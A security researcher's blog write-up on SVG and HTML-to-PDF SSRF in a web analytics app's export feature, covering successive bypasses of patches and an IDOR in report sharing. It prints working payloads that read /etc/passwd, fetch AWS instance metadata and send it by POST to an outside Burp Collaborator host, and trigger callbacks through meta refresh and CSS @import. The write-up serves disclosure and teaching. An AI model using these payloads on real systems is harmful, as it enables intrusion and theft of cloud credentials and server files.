Summary

The website content details the process of discovering and exploiting Server-Side Request Forgery (SSRF) vulnerabilities within a web-based analytics application, including various bypass techniques for implemented security patches.

Abstract

The article discusses the author's experience with SSRF vulnerabilities in a web analytics application used by research institutions. The application allowed users to export data visualizations as DOCX, PDF, and PNG files. The author exploited an initial HTML injection vulnerability, which led to the discovery of an SVG SSRF vulnerability that allowed the retrieval of local files, such as /etc/passwd. After the customer applied patches to encode certain tags, the author describes multiple bypass techniques using SVG payloads, event-based JavaScript execution, and CSS import methods to exfiltrate data. The article also touches on an Insecure Direct Object References (IDOR) vulnerability that allowed unauthorized access to reports shared among co-researchers. The author emphasizes the importance of thorough validation and encoding to prevent such vulnerabilities.

Opinions

The author believes that SVG SSRF vulnerabilities can be severe, allowing attackers to access sensitive files on the server.
The author values the use of resources like the SVG cheatsheet for exploiting server-side SVG processors, indicating its effectiveness in bypassing security measures.
The author suggests that security patches should be comprehensive, as partial fixes can be bypassed using creative payloads and alternative techniques.
The author highlights the importance of security awareness and the continuous evolution of attack vectors, even after patches are applied.
The author acknowledges the contributions of the security community, referencing a talk by Nahamsec and a bypass technique shared on Twitter, as valuable resources for developing new attack methods.
The author implies that security is an ongoing process, requiring developers and security professionals to stay informed and proactive in defending against new and evolving threats.

SVG SSRFs and saga of bypasses

Hi all, hope you are keeping well and staying safe. This blog is about my recent experiences with SVG, HTML to PDF SSRF, and bypasses for the patches applied.

Introduction

I was testing an app that was a web-based analytics solution that dealt with research institutions worldwide to analyze new, emerging research trends, and create reports.

As the application heavily deals with data analytics, the app had functionalities to show the research data as pie charts, graphs, tables, etc. Reports can also be prepared with the data and shared with co-researchers.

These pie charts, reports, and graphs could be exported to DOCX, PDF, and PNG. You see where I’m going right?

Exploitation

As we learned earlier, the research data is shown in the form of charts. Below is a screenshot for the same.

To the right of the screenshot, we see the option to “Export the chart as an image”

Upon clicking the “Export chart as an image”, we see a POST request going to with the image content like in the below screenshot.

I initially just deleted the whole content parameter and replaced with

h1 injection

The image was a PNG image, and after replacing the content with the “h1” tag, the server didn’t have any validation/output encoding and I could see the h1 tag injected successfully. I don’t have many screenshots on this.

Since HTMLi worked out alright, I noticed many svg tags being sent. I just used the below payload to retrieve etc/passwd content.

<svg width="500" height="500"  xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">

<foreignObject width="500" height="500">

<iframe xmlns="http://www.w3.org/1999/xhtml" src="file:///etc/passwd" width="800" height="850"/>

</foreignObject>

</svg>

And I was able to retrieve the file content as expected.

Patch Applied

## Bypass-1

The customer applied encoding for tags like iframe script . So it wasn’t so simple to get file contents as earlier.

Here I would like to introduce a great resource for exploiting SVG SSRF.

GitHub - allanlw/SVG-cheatsheet: A cheatsheet for exploiting server-side SVG processors.

A cheatsheet for exploiting server-side SVG processors. - GitHub - allanlw/svg-cheatsheet: A cheatsheet for exploiting…

github.com

I was able to receive callbacks on my server using image tags and other tags using src attributes.

Since javascript (script) tags weren’t allowed my thought process was to somehow find a way to run JS.

Going through https://github.com/allanlw/svg-cheatsheet I learned that “inline in event javascript” can be run.

I used the payload at https://github.com/allanlw/svg-cheatsheet#inline-in-event and the inline JS did work.

Now I needed a way to exfiltrate the data. I constructed the below payload

<svg width="100%" height="100%" viewBox="0 0 100 100"

xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">

<image xlink:href="https://google.com/favicon.ico" height="20" width="20" onload="fetch('http://169.254.169.254/latest/meta-data/hostname').then(function (response) {

response.text().then(function(text) {

var params = text;

var http = new XMLHttpRequest();

var url = 'https://<>.burpcollaborator.net/';

http.open('POST', url, true);

http.send(params);

})});" />

</svg>

How did the payload work?

We load Google’s favicon and on successful load, the event handler onload is triggered.
Using Fetch API, we request AWS Metadata.
We store the metadata response in the “params” parameter.
The server then makes a POST request to the burp collaborator server, with the metadata as the POST body. See attached images for evidence.

## Bypass-2

The customer has now implemented a fix to block javascript. Also if you remember there was output encoding applied on tags like script iframe etc.

Then I read this interesting bypass — https://twitter.com/kunalp94/status/1502527605836173312

I used the same meta tag and it turned out to be successful. Sharing the payload below

<meta http-equiv="refresh" content="0;url=http://169.254.169.254" />

## Bypass-3

More output encoding is applied by the customer. I was running out of options and then remembered the great talk by Nahamsec. Video below

Here Ben talks about missing validation at style tags (CSS). I tried the same.

I tried with style, import , link tags. I was successful in getting callbacks.

I used the below payload (HTML inside style tag) and it worked!!

<style><h1>h1taginjection</h1><iframe xmlns="http://www.w3.org/1999/xhtml" src="file:///etc/passwd" width="800" height="850"/>
    @import url(http://ta79rlzq77p2kdoak91nqryxlorff4.burpcollaborator.net/import.css);

</style>

## Final Fix

After yet another patch and more encoding, I tried various tags and wasn’t successful.

Report to DOCX SSRF

Similar to the above exploitation, the “Export report to DOCX” was also vulnerable.

IDOR at sharing reports

Also, a simple bug was present, where the reports could be shared with co-researchers. There was functionality to invite users via email and also set permissions such as view only and edit.

The request contained the reportID which was numerical and the permission , email .

I changed the reportID and was able to invite me to other researcher reports.

That’s it for this blog.

Hope you pick up something new from this blog.

Preetham.